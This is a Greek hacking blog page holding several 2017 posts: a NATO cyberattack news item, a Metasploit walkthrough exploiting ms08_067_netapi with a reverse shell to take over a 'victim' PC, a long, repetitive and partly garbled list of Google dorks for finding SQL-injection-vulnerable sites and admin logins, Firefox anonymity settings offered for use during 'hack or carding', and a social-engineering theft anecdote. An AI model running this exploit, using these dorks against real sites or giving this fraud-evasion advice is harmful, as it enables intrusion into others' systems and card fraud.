Kατεβάσετε την εφαρμογή android του blog! DownLoad

FoulsCode: 2011-17

Translate

Πρόσφατα Σχόλια

Σύνολο αναρτήσεων

Συνολικές προβολές σελίδας

Το NATO δέχεται 500 επιθέσεις hacking το μήνα!

Written By Fouls Code on Κυριακή, 22 Ιανουαρίου 2017 | Ιανουαρίου 22, 2017



Tο NATO αποτελεί στόχο για πολλούς hackers παγκοσμίως καθώς σύμφωνα με πρόσφατο δημοσίευμα δέχεται κάθε μήνα κατά μέσο όρο 500 επιθέσεις.







Ο Oana Lungescu, εκπρόσωπος του ΝΑΤΟ, δήλωσε στο CNN ότι σημειώνεται αύξηση περίπου 60% του αριθμού των επιθέσεων το 2016 σε σχέση με το 2015. Συνήθως, η ταυτότητα των εισβολέων είναι δύσκολο να προσδιοριστεί παρόλο που γίνονται άμεσα έρευνες για τον εντοπισμό τους. Αναμφίβολα, οι ξένες κυβερνήσεις, οι εγκληματίες και οι τρομοκράτες αποτελούν πιθανή προέλευση των επιθέσεων αλλά σύμφωνα με τους ειδικούς ο υποψήφιος που κερδίζει με διαφορά είναι τα αντίπαλα έθνη.

Το μόνο σίγουρο είναι ότι το ΝΑΤΟ ξέρει πώς να διαχειριστεί την κατάσταση. Συγκεκριμένα, στα μέσα του 2016 προειδοποίησε του hackers ότι αν επιδιώξουν και άλλες επιθέσεις θα έχουν να αντιμετωπίσουν την απάντηση του συνόλου της συμμαχίας στο πλαίσιο του “Article V”, το σύμφωνο της αμοιβαίας άμυνας. «Έχουμε αποφασίσει στην επόμενη διαδικτυακή επίθεση να ανταποδώσουμε με παρόμοιο τρόπο όλο το σύνολο της συμμαχίας ενωμένο» προειδοποίησε ο Jens Stoltenberg. Συνεχίζοντας ο κύριος Stoltenberg τόνισε ότι λαμβάνουν πολύ σοβαρά τις επιθέσεις στον κυβερνοχώρο τους και τις αντιμετωπίζουν με τον ίδιο τρόπο που θα έκαναν σε περίπτωση ένοπλης επίθεσης.

Σύμφωνα με φήμες η Ρωσία είναι η πιθανή χώρα που κρύβεται πίσω από τις επιθέσεις αυτές μια τακτική που ακολούθησε και στις ΗΠΑ κατά την διάρκεια της εκλογικής αναμέτρησης του 2016. Δεδομένου αυτού οι ευρωπαϊκές κυβερνήσεις βρίσκονται σε επιφυλακή για μελλοντικές επιθέσεις από την ρωσική πλευρά κατά την διάρκεια των δικών τους εκλογικών αναμετρήσεων.

Από την άλλη πλευρά, η Ρωσία αρνείται τις κατηγορίες αυτές υποστηρίζοντας πως όχι απλά δεν είναι ο θύτης αλλά είναι το θύμα παρόμοιων επιθέσεων.









Πηγή: secnews
Ιανουαρίου 22, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Written By Fouls Code on Τρίτη, 17 Ιανουαρίου 2017 | Ιανουαρίου 17, 2017



Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.




Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="">
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <- attacker="" ip="" span="">
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <- span="">

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

via: securitydnainfo.blogspot.gr
Ιανουαρίου 17, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Λίστα με dorks για sql injection



Mερικά dorks τα οποία μπορούμε να τα βάλουμε στο google και να κάνουμε αναζήτηση για ευπαθείς σελίδες στην sql injection.




inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
 

inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Ιανουαρίου 17, 2017 | 0 σχόλια | Διαβάστε περισσότερα

ΤΟ ΠΡΟΣΘΕΤΟ GHOSTERY ΔΙΝΕΙ ΤΑ ΣΤΟΙΧΕΙΑ ΜΑΣ ΣΤΙΣ ΕΤΑΙΡΕΙΕΣ ΔΙΑΦΗΜΙΣΗΣ!

Written By Fouls Code on Τετάρτη, 11 Ιανουαρίου 2017 | Ιανουαρίου 11, 2017




Θα μπορούσαμε να το αποκαλέσουμε και κράχτη αφού αποτελεί ουσιαστικό μέρος της εργαλειοθήκης μας όταν είμαστε συνδεδεμένοι στο διαδίκτυο και προστατεύει την ιδιωτική μας ζωή.
Αυτό που οι περισσότεροι χρήστες δεν συνειδητοποιούν, αναφέρει το περιοδικό MIT Technology Review, είναι ότι η Evidon που είναι μητρική εταιρεία της Ghostery, συλλέγει τα δεδομένα των χρηστών και τα πωλεί στους διαφημιστές.




Θα πρέπει να καταστεί σαφές ότι αν επιλέξετε να ξεκλικάρετε την επιλογή για κοινή χρήση πληροφοριών εντός της Ghostery, τότε αυτομάτως αποκλείεται η συλλογή των δεδομένων σας και η Evidon συμμορφώνεται με τις πληροφορίες αυτού το αιτήματος.

Ο συν-ιδρυτής και Διευθύνων Σύμβουλος της Evidon, ο Scott Meyer, λέει ότι δεν υπάρχει καμμία σύγκρουση των δύο ρόλων της εταιρείας του που διαδραματίζει έναν καίριο ρόλο καθώς προσφέρει στους χρήστες ένα εργαλείο που τους κρύβει από τον κλάδο της διαφήμισης ενώ παράλληλα παρέχει δεδομένα σχετικά με τους χρήστες σε διαφημιστικές εταιρείες.
Οτιδήποτε δίνει στους ανθρώπους περισσότερη διαφάνεια και έλεγχο, είναι καλό για τη βιομηχανία, λέει ο Meyer.
Η Evidon προωθεί δύο υπηρεσίες στους πελάτες της.
Το πρώτο της προφίλ είναι αυτό που μπλοκάρει τον κώδικα παρακολούθησης των ιστοσελίδων, και επιτρέπει στους διαχειριστές του site να βλέπουν από πού προέρχεται η παρακολούθηση και πώς αυτή επηρεάζει την ταχύτητα των σελίδων τους. Το δεύτερο προφίλ της Evidon παρέχει στους διαφημιστές στατιστικά στοιχεία σχετικά με τον τρόπο που οι συνήθεις trackers άλλων εταιρειών, δηλαδή όλοι αυτοί οι… καλόβουλοι άνθρωποι που προσπαθούν να αντλήσουν τα δεδομένα μας, κινούνται στο Διαδίκτυο.

Το πρώτο προφίλ, λέει ο Meyer, είναι πολύ σημαντικό, διότι οι ιδιοκτήτες συχνά δεν συνειδητοποιούν τι κώδικα παρακολούθησης χρησιμοποιούν για τους επισκέπτες τους οι άλλοι δικτυακοί τόποι. Είναι κάτι σύνηθες για τον χειριστή μιας ιστοσελίδας.

Όχι βέβαια πως ο καθένας από εμάς μπορεί να είναι πεπεισμένος ότι η δυαδικότητα του ρόλου της Evidon που με το ένα πόδι προασπίζει την ιδιωτικότητα των καταναλωτών και με το άλλο πόδι δίνει τα στοιχεία τους στον κλάδο της διαφήμισης, είναι τόσο ακίνδυνη όσο ισχυρίζεται ο Meyer.

Η Evidon πωλεί ένα σημαντικό ποσοστό των δεδομένων των χρηστών της σε εταιρείες διαφήμισης, θέλοντας να διασφαλίσει τη συμφωνία τους με το πρόγραμμα AdChoices.
Το AdChoices υποτίθεται ότι υπάρχει για να βοηθήσει τους ανθρώπους να απαλλαγούν από στοχευμένες διαφημίσεις από τη στιγμή που θα επιλέξουν να μην έχουν ενεργοποιημένη την επιλογή αυτή.
Την ίδια στιγμή, όμως, η Evidon έχει έννομο συμφέρον στο να επιδιώκει την επιτυχία του προγράμματος AdChoices, προκειμένου να ανταγωνιστεί άλλες εναλλακτικές λύσεις όπως το «Do Not Track», που έρχεται πλέον ως πρότυπο σε ορισμένα προγράμματα περιήγησης.

geo.enabled = false
geo.wifi.uri = [αφηστετο κενο]
network.http.accept.default =text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
network.http.use-cache = false
network.http.keep-alive.timeout = 600
network.http.max-persistent-connections-per-proxy = 16
network.proxy.socks_remote_dns = true
network.cookie.lifetimePolicy = 2
network.http.sendRefererHeader = 0
network.http.sendSecureXSiteReferrer = false
network.protocol-handler.external = false
network.protocol-handler.warn-external = true
network.http.pipelining = true
network.http.pipelining.maxrequests = 8
network.http.proxy.keep-alive = true
network.http.proxy.pipelining = true
network.prefetch-next = false
browser.cache.disk.enable = false
browser.cache.offline.enable = false
browser.sessionstore.privacy_level = 2
browser.sessionhistory.max_entries = 2
browser.display.use_document_fonts = 0
dom.storage.enabled = false
extensions.blocklist.enabled = false




Πρόσθετες Συστάσεις Ασφαλείας

1 Απενεργοποίηση όλων τον plugins

2- Απενεργοποίηση όλων τον update την ώρα του hack η του carding

3 Απενεργοποίηση και καθαρισμός σε ότι έχει σχέση με ιστορικό

Απαραίτητα Addons
1. BetterPrivacy
2. Close n forget
3. Ghostery
4. Https-Everywhere
5. Modify Headers
6. NoScript
7. RefControl
8. User Agent Switcher



via: www.greekhacking.com

via: www.osarena.net
Ιανουαρίου 11, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Social Engineering : Παράδειγμα



Αυτό το παράδειγμα είναι αυτούσιο από το βιβλίο Social Engineering The Art of Human Hacking του Christopher Hadnagy και θα το παραθέσω μεταφρασμένο.

O C.H. λοιπόν μας μιλάει για την εμπειρία του όταν προσφέρθηκε να δείξει σε ένα show του BBC πόσο εύκολο θα ήταν όχι μόνο να κλέψει την τσάντα μιας γυναίκας και να πάρει την πιστωτική της κάρτα αλλά και τον κωδικό. Το BBC ασφαλώς είπε ότι αυτό δεν πρόκειται να συμβεί. Ο ίδιος με την ομάδα του ήξεραν ότι μπορούσαν να το κάνουν αφού είχαν αναφερθεί τέτοιου είδους απάτες.

Για να διαδραματίσουν λοιπόν το "πείραμα" τους πήγαν σε μια τοπική καφετέρια. Η καφετέρια ήταν στον ψηλότερο όροφο ενώς πολυκαταστήματος στην Oxford Street. Ήταν σχεδόν άδειο και αυτός έκατσε σε ένα άδειο τραπέζι φορώντας ένα "επαγγελματικό" κουστούμι, άφησε τον χαρτοφύλακα του στο τραπέζι και περίμενε για το κατάλληλο θύμα. Μετά από λίγη ώρα το κατάλληλο θύμα έφτασε μαζί με ένα φίλο του και κάτσανε στο διπλανό τραπέζι και το θύμα (η γυναίκα) άφησε την τσάντα στην καρέκλα δίπλα και είχε όλη την ώρα πάνω από αυτήν το χέρι της όπως κάνουν οι περισσότερες γυναίκες.

Ο ίδιος λέει ότι έπρεπε να κλέψει ολόκληρη την τσάντα της ενώ είχε το χέρι της συνέχεια από πάνω και ο φίλος της καθόταν ακριβώς απέναντι οπότε τα πράγματα άρχισαν να δυσκολεύουν. Μετά από λίγο όμως ο φίλος της πήγε στην τουαλέτα και τότε το θύμα έμεινε μόνο του. Ο C.Η. έδωσε το "σήμα" στον Alex και την Jess (μέλη της ομάδας).

Αυτοί λοιπόν έπαιξαν το ρόλο του ζευγαριού και πήγαν και ζήτησαν από το θύμα να τους βγάλει μια φωτογραφία, και το θύμα ήταν ευπρόσδεκτο να το κάνει. Έβγαλε το χέρι της από την τσάντα για να πάρει την φωτογραφική και να βγάλει φωτογραφία το "Ευτυχισμένο ζευγάρι" και όσο το έκανε αυτό ο C.H. πλησίασε και πήρε την τσάντα της και την έβαλε ψύχραιμα στο χαρτοφύλακα του.

